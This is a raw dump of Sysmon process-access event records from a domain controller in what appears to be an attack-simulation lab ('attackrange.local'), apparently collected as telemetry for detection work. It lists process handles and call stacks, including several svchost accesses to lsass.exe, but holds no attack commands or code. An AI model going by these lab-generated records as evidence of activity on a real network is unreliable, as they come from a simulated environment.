Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+124a5|C:\Windows\System32\windows.storage.dll+e7227|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+1dde9|C:\Windows\SYSTEM32\IEFRAME.dll+1de5b|C:\Windows\SYSTEM32\IEFRAME.dll+25cc1|C:\Windows\SYSTEM32\IEFRAME.dll+264e5|C:\Windows\SYSTEM32\IEFRAME.dll+d4456|C:\Windows\SYSTEM32\IEFRAME.dll+d3e2f|C:\Windows\SYSTEM32\IEFRAME.dll+d3d31|C:\Windows\SYSTEM32\IEFRAME.dll+d3b54|C:\Windows\SYSTEM32\IEFRAME.dll+d3ab1|C:\Windows\SYSTEM32\IEFRAME.dll+3005e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013122Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:49.295{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+124a5|C:\Windows\System32\windows.storage.dll+e7192|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+1dde9|C:\Windows\SYSTEM32\IEFRAME.dll+1de5b|C:\Windows\SYSTEM32\IEFRAME.dll+25cc1|C:\Windows\SYSTEM32\IEFRAME.dll+264e5|C:\Windows\SYSTEM32\IEFRAME.dll+d4456|C:\Windows\SYSTEM32\IEFRAME.dll+d3e2f|C:\Windows\SYSTEM32\IEFRAME.dll+d3d31|C:\Windows\SYSTEM32\IEFRAME.dll+d3b54|C:\Windows\SYSTEM32\IEFRAME.dll+d3ab1|C:\Windows\SYSTEM32\IEFRAME.dll+3005e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013121Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:49.295{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+6422|C:\Windows\System32\shcore.dll+611d|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\windows.storage.dll+e7177|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+1dde9|C:\Windows\SYSTEM32\IEFRAME.dll+1de5b|C:\Windows\SYSTEM32\IEFRAME.dll+25cc1|C:\Windows\SYSTEM32\IEFRAME.dll+264e5|C:\Windows\SYSTEM32\IEFRAME.dll+d4456|C:\Windows\SYSTEM32\IEFRAME.dll+d3e2f|C:\Windows\SYSTEM32\IEFRAME.dll+d3d31|C:\Windows\SYSTEM32\IEFRAME.dll+d3b54|C:\Windows\SYSTEM32\IEFRAME.dll+d3ab1|C:\Windows\SYSTEM32\IEFRAME.dll+3005e|C:\Windows\SYSTEM32\ntdll.dll+39d09 10341000x800000000000000013120Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:49.295{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+60f4|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\windows.storage.dll+e7177|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+1dde9|C:\Windows\SYSTEM32\IEFRAME.dll+1de5b|C:\Windows\SYSTEM32\IEFRAME.dll+25cc1|C:\Windows\SYSTEM32\IEFRAME.dll+264e5|C:\Windows\SYSTEM32\IEFRAME.dll+d4456|C:\Windows\SYSTEM32\IEFRAME.dll+d3e2f|C:\Windows\SYSTEM32\IEFRAME.dll+d3d31|C:\Windows\SYSTEM32\IEFRAME.dll+d3b54|C:\Windows\SYSTEM32\IEFRAME.dll+d3ab1|C:\Windows\SYSTEM32\IEFRAME.dll+3005e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a 10341000x800000000000000013119Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:49.295{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+124a5|C:\Windows\System32\windows.storage.dll+e7227|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+1dde9|C:\Windows\SYSTEM32\IEFRAME.dll+1de5b|C:\Windows\SYSTEM32\IEFRAME.dll+25cc1|C:\Windows\SYSTEM32\IEFRAME.dll+264e5|C:\Windows\SYSTEM32\IEFRAME.dll+d4456|C:\Windows\SYSTEM32\IEFRAME.dll+d3e2f|C:\Windows\SYSTEM32\IEFRAME.dll+d3d31|C:\Windows\SYSTEM32\IEFRAME.dll+d3b54|C:\Windows\SYSTEM32\IEFRAME.dll+d3ab1|C:\Windows\SYSTEM32\IEFRAME.dll+3005e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013118Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:49.295{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+124a5|C:\Windows\System32\windows.storage.dll+e7192|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+1dde9|C:\Windows\SYSTEM32\IEFRAME.dll+1de5b|C:\Windows\SYSTEM32\IEFRAME.dll+25cc1|C:\Windows\SYSTEM32\IEFRAME.dll+264e5|C:\Windows\SYSTEM32\IEFRAME.dll+d4456|C:\Windows\SYSTEM32\IEFRAME.dll+d3e2f|C:\Windows\SYSTEM32\IEFRAME.dll+d3d31|C:\Windows\SYSTEM32\IEFRAME.dll+d3b54|C:\Windows\SYSTEM32\IEFRAME.dll+d3ab1|C:\Windows\SYSTEM32\IEFRAME.dll+3005e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013117Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:49.295{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+6422|C:\Windows\System32\shcore.dll+611d|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\windows.storage.dll+e7177|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+1dde9|C:\Windows\SYSTEM32\IEFRAME.dll+1de5b|C:\Windows\SYSTEM32\IEFRAME.dll+25cc1|C:\Windows\SYSTEM32\IEFRAME.dll+264e5|C:\Windows\SYSTEM32\IEFRAME.dll+d4456|C:\Windows\SYSTEM32\IEFRAME.dll+d3e2f|C:\Windows\SYSTEM32\IEFRAME.dll+d3d31|C:\Windows\SYSTEM32\IEFRAME.dll+d3b54|C:\Windows\SYSTEM32\IEFRAME.dll+d3ab1|C:\Windows\SYSTEM32\IEFRAME.dll+3005e|C:\Windows\SYSTEM32\ntdll.dll+39d09 10341000x800000000000000013116Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:49.295{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+60f4|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\windows.storage.dll+e7177|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+1dde9|C:\Windows\SYSTEM32\IEFRAME.dll+1de5b|C:\Windows\SYSTEM32\IEFRAME.dll+25cc1|C:\Windows\SYSTEM32\IEFRAME.dll+264e5|C:\Windows\SYSTEM32\IEFRAME.dll+d4456|C:\Windows\SYSTEM32\IEFRAME.dll+d3e2f|C:\Windows\SYSTEM32\IEFRAME.dll+d3d31|C:\Windows\SYSTEM32\IEFRAME.dll+d3b54|C:\Windows\SYSTEM32\IEFRAME.dll+d3ab1|C:\Windows\SYSTEM32\IEFRAME.dll+3005e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a 10341000x800000000000000013124Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:51.373{08A6967A-4753-6000-1105-000000009A01}45042676C:\Windows\system32\taskhostw.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013128Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:55.139{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013127Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:55.139{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013126Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:55.139{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013125Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:55.139{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013131Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:59.107{08A6967A-4753-6000-0D05-000000009A01}11165564C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\TokenBroker.dll+1acfa|C:\Windows\System32\TokenBroker.dll+1d475|C:\Windows\System32\TokenBroker.dll+1d7f9|C:\Windows\System32\TokenBroker.dll+1e8f3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000013130Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:59.107{08A6967A-4753-6000-0D05-000000009A01}11165564C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\TokenBroker.dll+21886|C:\Windows\System32\TokenBroker.dll+1ac23|C:\Windows\System32\TokenBroker.dll+1d475|C:\Windows\System32\TokenBroker.dll+1d7f9|C:\Windows\System32\TokenBroker.dll+1e8f3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000013129Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:59.045{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013142Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:07.779{08A6967A-4288-6000-1000-000000009A01}11362824C:\Windows\system32\svchost.exe{08A6967A-479B-6000-3B05-000000009A01}5220C:\Windows\SysWOW64\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013141Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:07.779{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-479B-6000-3B05-000000009A01}5220C:\Windows\SysWOW64\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013140Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:07.764{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-479B-6000-3B05-000000009A01}5220C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013139Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:07.764{08A6967A-4750-6000-0205-000000009A01}47883304C:\Windows\system32\csrss.exe{08A6967A-479B-6000-3B05-000000009A01}5220C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013138Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:07.764{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013137Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:07.764{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013136Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:07.764{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013135Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:07.764{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013134Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 